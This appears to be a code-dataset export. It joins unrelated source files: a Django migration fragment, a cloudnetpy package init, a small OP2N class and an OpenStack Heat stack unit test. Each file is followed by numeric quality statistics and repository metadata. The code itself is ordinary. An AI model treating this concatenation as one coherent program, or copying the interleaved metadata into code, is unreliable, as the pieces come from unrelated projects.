field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securitybond',
name='fix1',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securitybond',
name='fix2',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securitybond',
name='general_ledger',
field=models.CharField(max_length=4),
),
migrations.AlterField(
model_name='securitybond',
name='isin',
field=models.CharField(max_length=20),
),
migrations.AlterField(
model_name='securitybond',
name='multiplier_for_online_prices',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securitybond',
name='provider_code',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='securitybond',
name='quotation_place',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='ratelist',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='subtype',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securitybond',
name='symbol',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securitybond',
name='trading_category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='asset_allocation',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='bank_reference',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityfutures',
name='category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='deposit_place',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityfutures',
name='designation',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityfutures',
name='fix1',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityfutures',
name='fix2',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityfutures',
name='general_ledger',
field=models.CharField(max_length=4),
),
migrations.AlterField(
model_name='securityfutures',
name='isin',
field=models.CharField(max_length=20),
),
migrations.AlterField(
model_name='securityfutures',
name='maturity_date',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='securityfutures',
name='multiplier_for_online_prices',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securityfutures',
name='number_of_units',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securityfutures',
name='provider_code',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='securityfutures',
name='quotation_place',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='ratelist',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='subtype',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='symbol',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityfutures',
name='trading_category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityfutures',
name='underlying_code',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='asset_allocation',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='bank_reference',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityoption',
name='category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='deposit_place',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityoption',
name='designation',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityoption',
name='fix1',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityoption',
name='fix2',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityoption',
name='general_ledger',
field=models.CharField(max_length=4),
),
migrations.AlterField(
model_name='securityoption',
name='isin',
field=models.CharField(max_length=20),
),
migrations.AlterField(
model_name='securityoption',
name='multiplier_for_online_prices',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securityoption',
name='provider_code',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='securityoption',
name='quotation_place',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='ratelist',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='strike_place',
field=models.FloatField(),
),
migrations.AlterField(
model_name='securityoption',
name='subtype',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='symbol',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityoption',
name='trading_category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityoption',
name='underlying_code',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='asset_allocation',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='bank_reference',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityshare',
name='category',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='deposit_place',
field=models.CharField(max_length=6),
),
migrations.AlterField(
model_name='securityshare',
name='designation',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityshare',
name='fix1',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityshare',
name='fix2',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='securityshare',
name='general_ledger',
field=models.CharField(max_length=4),
),
migrations.AlterField(
model_name='securityshare',
name='isin',
field=models.CharField(max_length=20),
),
migrations.AlterField(
model_name='securityshare',
name='multiplier_for_online_prices',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='securityshare',
name='provider_code',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='securityshare',
name='quotation_place',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='ratelist',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='subtype',
field=models.CharField(max_length=10),
),
migrations.AlterField(
model_name='securityshare',
name='symbol',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='securityshare',
name='trading_category',
field=models.CharField(max_length=10),
),
]
| 32.669291
| 86
| 0.549932
| 1,039
| 12,447
| 6.39846
| 0.087584
| 0.219615
| 0.274519
| 0.318442
| 0.959537
| 0.959537
| 0.913809
| 0.90704
| 0.90704
| 0.887184
| 0
| 0.019364
| 0.340323
| 12,447
| 380
| 87
| 32.755263
| 0.790281
| 0.005463
| 0
| 0.965147
| 1
| 0
| 0.147624
| 0.010908
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005362
| 0
| 0.013405
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
d2d272475b42199756737eaa3e91522a030bb8b5
| 150
|
py
|
Python
|
cloudnetpy/products/__init__.py
|
saveriogzz/cloudnetpy
|
baa3ed5f254425c5a9c787556ec652ea659b38ba
|
[
"MIT"
] | 13
|
2020-02-16T06:52:51.000Z
|
2022-03-10T09:43:19.000Z
|
cloudnetpy/products/__init__.py
|
saveriogzz/cloudnetpy
|
baa3ed5f254425c5a9c787556ec652ea659b38ba
|
[
"MIT"
] | 17
|
2020-01-15T10:47:08.000Z
|
2022-03-28T13:08:23.000Z
|
cloudnetpy/products/__init__.py
|
saveriogzz/cloudnetpy
|
baa3ed5f254425c5a9c787556ec652ea659b38ba
|
[
"MIT"
] | 12
|
2020-03-03T16:45:13.000Z
|
2022-03-23T08:02:43.000Z
|
from .drizzle import generate_drizzle
from .classification import generate_classification
from .iwc import generate_iwc
from .lwc import generate_lwc
| 30
| 51
| 0.866667
| 20
| 150
| 6.3
| 0.35
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 150
| 4
| 52
| 37.5
| 0.940299
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
824dfb5ce8407c2f54b2a39aa7748766c40c83be
| 144
|
py
|
Python
|
genelang/bricks/OP2N.py
|
GabrielAmare/Genelang
|
af5294e900d2f79ff54375f9759c156a4b5a098a
|
[
"MIT"
] | null | null | null |
genelang/bricks/OP2N.py
|
GabrielAmare/Genelang
|
af5294e900d2f79ff54375f9759c156a4b5a098a
|
[
"MIT"
] | null | null | null |
genelang/bricks/OP2N.py
|
GabrielAmare/Genelang
|
af5294e900d2f79ff54375f9759c156a4b5a098a
|
[
"MIT"
] | null | null | null |
from .OP2 import OP2
class OP2N(OP2):
def __str__(self):
return f"{str(self.items[0])}{str(self.symbols[0])}{str(self.items[1])}"
| 20.571429
| 80
| 0.625
| 24
| 144
| 3.583333
| 0.583333
| 0.325581
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058333
| 0.166667
| 144
| 6
| 81
| 24
| 0.658333
| 0
| 0
| 0
| 0
| 0.25
| 0.430556
| 0.430556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
827a465adde88652ee07f88d8e3202f88ae46bb7
| 26,874
|
py
|
Python
|
openstack/tests/unit/cloud/test_stack.py
|
anton-sidelnikov/openstacksdk
|
98f0c67120b65814c3bd1663415e302551a14536
|
[
"Apache-2.0"
] | null | null | null |
openstack/tests/unit/cloud/test_stack.py
|
anton-sidelnikov/openstacksdk
|
98f0c67120b65814c3bd1663415e302551a14536
|
[
"Apache-2.0"
] | null | null | null |
openstack/tests/unit/cloud/test_stack.py
|
anton-sidelnikov/openstacksdk
|
98f0c67120b65814c3bd1663415e302551a14536
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import tempfile
import testtools
import openstack.cloud
from openstack.orchestration.v1 import stack
from openstack.tests import fakes
from openstack.tests.unit import base
class TestStack(base.TestCase):
def setUp(self):
super(TestStack, self).setUp()
self.stack_id = self.getUniqueString('id')
self.stack_name = self.getUniqueString('name')
self.stack_tag = self.getUniqueString('tag')
self.stack = fakes.make_fake_stack(self.stack_id, self.stack_name)
def _compare_stacks(self, exp, real):
self.assertDictEqual(
stack.Stack(**exp).to_dict(computed=False),
real.to_dict(computed=False))
def test_list_stacks(self):
fake_stacks = [
self.stack,
fakes.make_fake_stack(
self.getUniqueString('id'),
self.getUniqueString('name'))
]
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stacks": fake_stacks}),
])
stacks = self.cloud.list_stacks()
[self._compare_stacks(b, a) for a, b in zip(stacks, fake_stacks)]
self.assert_calls()
def test_list_stacks_filters(self):
fake_stacks = [
self.stack,
fakes.make_fake_stack(
self.getUniqueString('id'),
self.getUniqueString('name'))
]
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'orchestration', 'public',
append=['stacks'],
qs_elements=['name=a', 'status=b'],
),
json={"stacks": fake_stacks}),
])
stacks = self.cloud.list_stacks(name='a', status='b')
[self._compare_stacks(b, a) for a, b in zip(stacks, fake_stacks)]
self.assert_calls()
def test_list_stacks_exception(self):
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
status_code=404)
])
with testtools.ExpectedException(
openstack.cloud.OpenStackCloudURINotFound):
self.cloud.list_stacks()
self.assert_calls()
def test_search_stacks(self):
fake_stacks = [
self.stack,
fakes.make_fake_stack(
self.getUniqueString('id'),
self.getUniqueString('name'))
]
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stacks": fake_stacks}),
])
stacks = self.cloud.search_stacks()
[self._compare_stacks(b, a) for a, b in zip(stacks, fake_stacks)]
self.assert_calls()
def test_search_stacks_filters(self):
fake_stacks = [
self.stack,
fakes.make_fake_stack(
self.getUniqueString('id'),
self.getUniqueString('name'),
status='CREATE_FAILED')
]
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stacks": fake_stacks}),
])
filters = {'status': 'FAILED'}
stacks = self.cloud.search_stacks(filters=filters)
[self._compare_stacks(b, a) for a, b in zip(stacks, fake_stacks)]
self.assert_calls()
def test_search_stacks_exception(self):
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
status_code=404)
])
with testtools.ExpectedException(
openstack.cloud.OpenStackCloudURINotFound):
self.cloud.search_stacks()
def test_delete_stack(self):
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{name}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name, resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id)),
])
self.assertTrue(self.cloud.delete_stack(self.stack_name))
self.assert_calls()
def test_delete_stack_not_found(self):
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/stack_name?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT, resolve=resolve),
status_code=404),
])
self.assertFalse(self.cloud.delete_stack('stack_name'))
self.assert_calls()
def test_delete_stack_exception(self):
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id),
status_code=400,
reason="ouch"),
])
with testtools.ExpectedException(
openstack.cloud.OpenStackCloudBadRequest):
self.cloud.delete_stack(self.stack_id)
self.assert_calls()
def test_delete_stack_by_name_wait(self):
marker_event = fakes.make_fake_stack_event(
self.stack_id, self.stack_name, status='CREATE_COMPLETE',
resource_name='name')
marker_qs = 'marker={e_id}&sort_dir=asc'.format(
e_id=marker_event['id'])
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{name}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='GET',
uri='{endpoint}/stacks/{name}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
qs='limit=1&sort_dir=desc'),
complete_qs=True,
json={"events": [marker_event]}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id)),
dict(method='GET',
uri='{endpoint}/stacks/{name}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
qs=marker_qs),
complete_qs=True,
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='DELETE_COMPLETE', resource_name='name'),
]}),
dict(method='GET',
uri='{endpoint}/stacks/{name}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name, resolve=resolve),
status_code=404),
])
self.assertTrue(self.cloud.delete_stack(self.stack_name, wait=True))
self.assert_calls()
def test_delete_stack_by_id_wait(self):
marker_event = fakes.make_fake_stack_event(
self.stack_id, self.stack_name, status='CREATE_COMPLETE',
resource_name='name')
marker_qs = 'marker={e_id}&sort_dir=asc'.format(
e_id=marker_event['id'])
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='GET',
uri='{endpoint}/stacks/{id}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
qs='limit=1&sort_dir=desc'),
complete_qs=True,
json={"events": [marker_event]}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id)),
dict(method='GET',
uri='{endpoint}/stacks/{id}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
qs=marker_qs),
complete_qs=True,
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='DELETE_COMPLETE'),
]}),
dict(method='GET',
uri='{endpoint}/stacks/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, resolve=resolve),
status_code=404),
])
self.assertTrue(self.cloud.delete_stack(self.stack_id, wait=True))
self.assert_calls()
def test_delete_stack_wait_failed(self):
failed_stack = self.stack.copy()
failed_stack['stack_status'] = 'DELETE_FAILED'
marker_event = fakes.make_fake_stack_event(
self.stack_id, self.stack_name, status='CREATE_COMPLETE')
marker_qs = 'marker={e_id}&sort_dir=asc'.format(
e_id=marker_event['id'])
resolve = 'resolve_outputs=False'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, resolve=resolve),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": self.stack}),
dict(method='GET',
uri='{endpoint}/stacks/{id}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
qs='limit=1&sort_dir=desc'),
complete_qs=True,
json={"events": [marker_event]}),
dict(method='DELETE',
uri='{endpoint}/stacks/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id)),
dict(method='GET',
uri='{endpoint}/stacks/{id}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id,
qs=marker_qs),
complete_qs=True,
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='DELETE_COMPLETE'),
]}),
dict(method='GET',
uri='{endpoint}/stacks/{id}?resolve_outputs=False'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name,
resolve=resolve))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}?{resolve}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name, resolve=resolve),
json={"stack": failed_stack}),
])
with testtools.ExpectedException(
openstack.cloud.OpenStackCloudException):
self.cloud.delete_stack(self.stack_id, wait=True)
self.assert_calls()
def test_create_stack(self):
test_template = tempfile.NamedTemporaryFile(delete=False)
test_template.write(fakes.FAKE_TEMPLATE.encode('utf-8'))
test_template.close()
self.register_uris([
dict(
method='POST', uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stack": self.stack},
validate=dict(
json={
'disable_rollback': False,
'parameters': {},
'stack_name': self.stack_name,
'tags': self.stack_tag,
'template': fakes.FAKE_TEMPLATE_CONTENT,
'timeout_mins': 60}
)),
dict(
method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
self.cloud.create_stack(
self.stack_name,
tags=self.stack_tag,
template_file=test_template.name
)
self.assert_calls()
def test_create_stack_wait(self):
test_template = tempfile.NamedTemporaryFile(delete=False)
test_template.write(fakes.FAKE_TEMPLATE.encode('utf-8'))
test_template.close()
self.register_uris([
dict(
method='POST', uri='{endpoint}/stacks'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT),
json={"stack": self.stack},
validate=dict(
json={
'disable_rollback': False,
'parameters': {},
'stack_name': self.stack_name,
'tags': self.stack_tag,
'template': fakes.FAKE_TEMPLATE_CONTENT,
'timeout_mins': 60}
)),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/events?sort_dir=asc'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='CREATE_COMPLETE',
resource_name='name'),
]}),
dict(
method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
self.cloud.create_stack(
self.stack_name,
tags=self.stack_tag,
template_file=test_template.name,
wait=True)
self.assert_calls()
def test_update_stack(self):
test_template = tempfile.NamedTemporaryFile(delete=False)
test_template.write(fakes.FAKE_TEMPLATE.encode('utf-8'))
test_template.close()
self.register_uris([
dict(
method='PUT',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
validate=dict(
json={
'disable_rollback': False,
'parameters': {},
'tags': self.stack_tag,
'template': fakes.FAKE_TEMPLATE_CONTENT,
'timeout_mins': 60}),
json={}),
dict(
method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
self.cloud.update_stack(
self.stack_name,
tags=self.stack_tag,
template_file=test_template.name)
self.assert_calls()
def test_update_stack_wait(self):
marker_event = fakes.make_fake_stack_event(
self.stack_id, self.stack_name, status='CREATE_COMPLETE',
resource_name='name')
marker_qs = 'marker={e_id}&sort_dir=asc'.format(
e_id=marker_event['id'])
test_template = tempfile.NamedTemporaryFile(delete=False)
test_template.write(fakes.FAKE_TEMPLATE.encode('utf-8'))
test_template.close()
self.register_uris([
dict(
method='GET',
uri='{endpoint}/stacks/{name}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
qs='limit=1&sort_dir=desc'),
json={"events": [marker_event]}),
dict(
method='PUT',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
validate=dict(
json={
'disable_rollback': False,
'parameters': {},
'tags': self.stack_tag,
'template': fakes.FAKE_TEMPLATE_CONTENT,
'timeout_mins': 60}),
json={}),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
qs=marker_qs),
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='UPDATE_COMPLETE',
resource_name='name'),
]}),
dict(
method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
self.cloud.update_stack(
self.stack_name,
tags=self.stack_tag,
template_file=test_template.name,
wait=True)
self.assert_calls()
def test_get_stack(self):
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
res = self.cloud.get_stack(self.stack_name)
self.assertIsNotNone(res)
self.assertEqual(self.stack['stack_name'], res['name'])
self.assertEqual(self.stack['stack_status'], res['stack_status'])
self.assertEqual('CREATE_COMPLETE', res['status'])
self.assert_calls()
def test_get_stack_in_progress(self):
in_progress = self.stack.copy()
in_progress['stack_status'] = 'CREATE_IN_PROGRESS'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": in_progress}),
])
res = self.cloud.get_stack(self.stack_name)
self.assertIsNotNone(res)
self.assertEqual(in_progress['stack_name'], res.name)
self.assertEqual(in_progress['stack_status'], res['stack_status'])
self.assertEqual('CREATE_IN_PROGRESS', res['status'])
self.assert_calls()
| 41.536321
| 79
| 0.514214
| 2,535
| 26,874
| 5.251677
| 0.068639
| 0.096672
| 0.088485
| 0.149027
| 0.899647
| 0.884925
| 0.874859
| 0.860963
| 0.848269
| 0.826936
| 0
| 0.004422
| 0.368944
| 26,874
| 646
| 80
| 41.600619
| 0.780588
| 0.019424
| 0
| 0.854484
| 0
| 0
| 0.121374
| 0.078512
| 0
| 0
| 0
| 0
| 0.050761
| 1
| 0.033841
| false
| 0
| 0.010152
| 0
| 0.045685
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
829e718d370d8e92deb1294691f43d900986fb04
| 14,136
|
py
|
Python
|
youtubesearchpython/streamurlfetcher.py
|
marcelosiqueira/youtube-search-python
|
